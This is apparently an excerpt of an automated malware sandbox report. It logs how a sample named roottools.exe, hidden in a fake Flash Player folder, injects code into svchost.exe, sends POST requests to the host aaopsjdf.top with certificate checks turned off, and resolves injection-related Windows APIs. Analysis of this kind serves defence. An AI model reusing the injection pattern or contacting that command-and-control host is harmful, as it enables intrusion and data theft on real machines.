| Inet | Read Response | size = 4096, size_out = 4096 |
|
12 | |
| Inet | Read Response | size = 4096, size_out = 639 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Get Time | type = Ticks, time = 176296 |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| COM | Create | interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD, CLSCTX_NO_FAILURE_LOG |
|
6 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, type = size, size_out = 171 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, size = 171, size_out = 171 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ÉÄ, url = aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ÉÄ, url = aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 88 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp |
|
1 | |
| System | Sleep | duration = 600000 milliseconds (600.000 seconds) |
|
1 |
| Information | Value |
|---|---|
| ID | #25 |
| File Name | c:\windows\syswow64\svchost.exe |
| Command Line | C:\Windows\SysWOW64\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Roaming\ |
| Monitor | Start Time: 00:07:38, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:35 |
| Information | Value |
|---|---|
| PID | 0x7e0 |
| Parent PID | 0x7e8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F4
0x
610
0x
654
0x
694
0x
414
0x
4D0
0x
7AC
0x
4BC
0x
3A4
0x
6B0
0x
46C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| imm32.dll | 0x00020000 | 0x0003dfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00031fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x0008bfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x0009bfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x0009afff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | Readable, Writable |
|
|
|
|
| rsaenh.dll | 0x000f0000 | 0x0012bfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000330000 | 0x00330000 | 0x0036ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000380000 | 0x00380000 | 0x0038ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x0047ffff | Private Memory | Readable, Writable |
|
|
|
|
| svchost.exe | 0x004a0000 | 0x004a7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000550000 | 0x00550000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000630000 | 0x00630000 | 0x0072ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000730000 | 0x00730000 | 0x008b7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x00a40fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x01e4ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001e50000 | 0x01e50000 | 0x02242fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002250000 | 0x02250000 | 0x0245ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002260000 | 0x02260000 | 0x0229ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022b0000 | 0x022b0000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002350000 | 0x02350000 | 0x0238ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023a0000 | 0x023a0000 | 0x023dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023e0000 | 0x023e0000 | 0x0245ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02460000 | 0x0272efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002760000 | 0x02760000 | 0x0279ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000027d0000 | 0x027d0000 | 0x0280ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002870000 | 0x02870000 | 0x028affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000028c0000 | 0x028c0000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002a70000 | 0x02a70000 | 0x02aaffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002b00000 | 0x02b00000 | 0x02b3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002b70000 | 0x02b70000 | 0x02baffff | Private Memory | Readable, Writable |
|
|
|
|
| wow64cpu.dll | 0x743d0000 | 0x743d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x743e0000 | 0x7443bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74440000 | 0x7447efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x75630000 | 0x7566afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x75670000 | 0x75685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x75690000 | 0x75697fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x75800000 | 0x7580bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75810000 | 0x7586ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x758c0000 | 0x759bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759c0000 | 0x75acffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x75ad0000 | 0x75ad4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75ae0000 | 0x75c3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x75c40000 | 0x75e3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x75e70000 | 0x75f1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75f20000 | 0x76014fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x760b0000 | 0x7610ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76110000 | 0x761acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x761b0000 | 0x7623efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x76240000 | 0x7635cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x76360000 | 0x7636bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76370000 | 0x763c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76570000 | 0x7663bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x76640000 | 0x76685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76690000 | 0x767c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x767d0000 | 0x767e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76800000 | 0x768effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x768f0000 | 0x768f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x76950000 | 0x769dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x76a70000 | 0x776b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000778b0000 | 0x778b0000 | 0x779a9fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000779b0000 | 0x779b0000 | 0x77acefff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77ad0000 | 0x77c78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77cb0000 | 0x77e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007ef9b000 | 0x7ef9b000 | 0x7ef9dfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef9e000 | 0x7ef9e000 | 0x7efa0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x7b4 | address = 0x70000, size = 114688 |
|
1 | |
| Modify Memory | #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x7b4 | address = 0x876c4, size = 4 |
|
1 | |
| Modify Memory | #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x7b4 | address = 0x877d0, size = 4 |
|
1 | |
| Modify Memory | #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x7b4 | address = 0x87d38, size = 4 |
|
1 | |
| Create Remote Thread | #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x7b4 | address = 0x795bc |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c |
|
1 | |
